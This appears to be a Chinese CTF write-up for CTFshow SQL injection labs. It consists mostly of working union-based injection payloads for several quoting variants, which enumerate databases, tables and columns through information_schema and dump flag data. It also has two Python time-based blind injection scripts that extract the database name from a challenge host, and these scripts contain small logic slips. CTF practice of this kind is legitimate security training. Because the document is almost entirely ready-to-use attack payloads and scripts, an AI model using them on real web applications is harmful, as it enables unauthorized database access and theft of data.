提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档
?id=1 显示正常
?id=1' 报错
?id=1' --+ 显示正常
基于错误的GET单引号字符型注入
?id=1' order by 3 --+
?id=0' union select 1,2,3 --+
?id=0' union select 1,2,database() --+ //当前库
?id=0' union select 1,2,group_concat(schema_name) from information_schema.schemata --+ //所有库
?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow' --+
?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flag' --+
?id=0' union select 1,2,group_concat(flag) from ctfshow.flag --+
?id=1 显示正常
?id=1' 报错
?id=1' --+ 报错
?id=1 --+ 显示正常
基于错误的GET整型注入
?id=1 order by 3 --+
?id=0 union select 1,2,3 --+
?id=0 union select 1,2,database() --+
?id=0 union select 1,2,group_concat(schema_name) from information_schema.schemata --+
?id=0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow' --+
?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flagaa' --+
?id=0 union select 1,2,group_concat(flagac) from ctfshow.flagaa--+
?id=1 显示正常
?id=1' 报错
?id=1' --+ 报错
?id=1') --+ 显示正常
基于错误的GET单引号变形字符型注入
?id=1') order by 3 --+
?id=0') union select 1,2,3 --+
?id=0') union select 1,2,database() --+ //当前库
?id=0') union select 1,2,group_concat(schema_name) from information_schema.schemata --+ //所有库
?id=0') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow' --+
?id=0') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flagaanec' --+
?id=0') union select 1,2,group_concat(flagaca) from ctfshow.flagaanec--+
基于错误的GET双引号字符型注入
?id=1") order by 3 --+
?id=0") union select 1,2,3 --+
?id=0") union select 1,2,database() --+ //当前库
?id=0") union select 1,2,group_concat(schema_name) from information_schema.schemata --+ //所有库
?id=0") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow' --+
?id=0") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flagsf' --+
?id=0") union select 1,2,group_concat(flag23) from ctfshow.flagsf--+
双注入GET单引号字符型注入
测试时,发现正常情况下只会显示You are in…
布尔盲注
?id=1' and sleep(5) --+
脚本:
1.获取数据库名长度
# coding:utf-8
import requests
import datetime
import time
def database_len():
for i in range(1, 10):
url = "http://22c5ef77-f9ec-4af9-98a5-d09243d65708.challenge.ctf.show/?id=1"
payload = " ?id=1' and if(length(database())>%s,sleep(1),0) --+" % i
# print(url+payload+'%23')
time1 = datetime.datetime.now()
r = requests.get(url + payload)
time2 = datetime.datetime.now()
sec = (time2 - time1).seconds
if sec >= 1:
print(i)
else:
print(i)
break
print('database_len:', i)
if __name__ == '__main__':
database_len()
2.获取当前数据库名
# coding:utf-8
import requests
import datetime
import time
def database_name():
name = ''
for j in range(1,9):
for i in '0123456789abcdefghijklmnopqrstuvwxyz':
url = "http://22c5ef77-f9ec-4af9-98a5-d09243d65708.challenge.ctf.show/?id=1"
payload = "?id=1' and if(substr(database(),%d,1)='%s',sleep(3),1) --+" % (j,i)
#print(url+payload)
time1 = datetime.datetime.now()
r = requests.get(url + payload)
time2 = datetime.datetime.now()
sec = (time2 - time1).seconds
if sec >=3:
name += i
print(name)
break
print('database_name:', name)
if __name__ == '__main__':
database_name()